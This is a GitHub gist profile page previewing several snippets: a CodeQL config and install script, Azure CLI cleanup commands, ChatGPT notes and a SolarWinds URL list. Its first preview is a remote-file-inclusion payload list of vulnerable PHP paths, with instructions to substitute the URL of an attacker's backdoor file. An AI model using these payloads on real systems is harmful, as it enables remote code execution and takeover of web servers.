Skip to content

Instantly share code, notes, and snippets.

View ruevaughn's full-sized avatar

Chase Jensen ruevaughn

View GitHub Profile
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX?
name: "My CodeQL config"
disable-default-queries: true
languages: java
queries:
- name: Extended Security
uses: security-extended
- name: Security and Quality
@ruevaughn
ruevaughn / install-codeql.sh
Created June 4, 2023 10:53 — forked from crashGoBoom/install-codeql.sh
Install codeql for MacOS (BigSur)
#!/bin/bash
# Check for latest release: https://github.com/github/codeql-cli-binaries/releases
_version='v2.4.1'
_arch='osx'
_zip_url="https://github.com/github/codeql-cli-binaries/releases/download/${_version}/codeql-${_arch}64.zip"
_dir='codeql-home'
_cores=2
pushd "${HOME}" || exit
@ruevaughn
ruevaughn / DevOps related courses with links
Created June 4, 2023 10:52 — forked from sd031/DevOps related courses with links
GCP, AWS Certification, DevOps / DevSecOps courses link that I did go through
@ruevaughn
ruevaughn / play_with_codeql.md
Created June 4, 2023 10:51 — forked from buzztaiki/play_with_codeql.md
CodeQL で遊んでみる

Public IPs

az resource delete --ids $(az network public-ip list --query '[?ipAddress==`null`].[id]' -o tsv)

Network Security Groups

az resource delete --ids $(az network public-ip list --query '[?ipAddress==`null`].[id]' -o tsv)

Network Interfaces

@ruevaughn
ruevaughn / chatgpt.md
Created May 1, 2023 20:29 — forked from veekaybee/chatgpt.md
Everything I understand about chatgpt

ChatGPT Resources

Context

ChatGPT appeared like an explosion on all my social media timelines in early December 2022. While I keep up with machine learning as an industry, I wasn't focused so much on this particular corner, and all the screenshots seemed like they came out of nowhere. What was this model? How did the chat prompting work? What was the context of OpenAI doing this work and collecting my prompts for training data?

I decided to do a quick investigation. Here's all the information I've found so far. I'm aggregating and synthesizing it as I go, so it's currently changing pretty frequently.

Model Architecture

@ruevaughn
ruevaughn / readwise_openai.ipynb
Created April 29, 2023 07:52 — forked from louis030195/readwise_openai.ipynb
Fine tuning OpenAI API on my readwise.io highlights
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@ruevaughn
ruevaughn / solarwinds-tweeted-urls.csv
Created April 29, 2023 07:48 — forked from edsu/solarwinds-tweeted-urls.csv
This is a count of URLs that were tweeted in this SolarWinds dataset https://catalog.docnow.io/datasets/20201230-solarwinds/ URLs were unshortened with https://github.com/docnow/unshrtn
We can't make this file beautiful and searchable because it's too large.
url,tweets
https://www.nytimes.com/2020/12/16/opinion/fireeye-solarwinds-russia-hack.html,5502
https://web.archive.org/web/20201213230906/https://www.solarwinds.com/company/customers,3460
https://www.thegatewaypundit.com/2020/12/breaking-fbi-texas-rangers-us-marshals-raid-solarwinds-hq-austin/,2372
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html,1559
https://www.geekwire.com/2020/microsoft-unleashes-death-star-solarwinds-hackers-extraordinary-response-breach/,1317
https://www.reuters.com/article/us-global-cyber-microsoft-idUSKBN28R3BY,955
https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network,805
https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/,706
https://www.reuters.com/article/us-usa-solarwinds-cyber-idUSKBN28N0Y7,661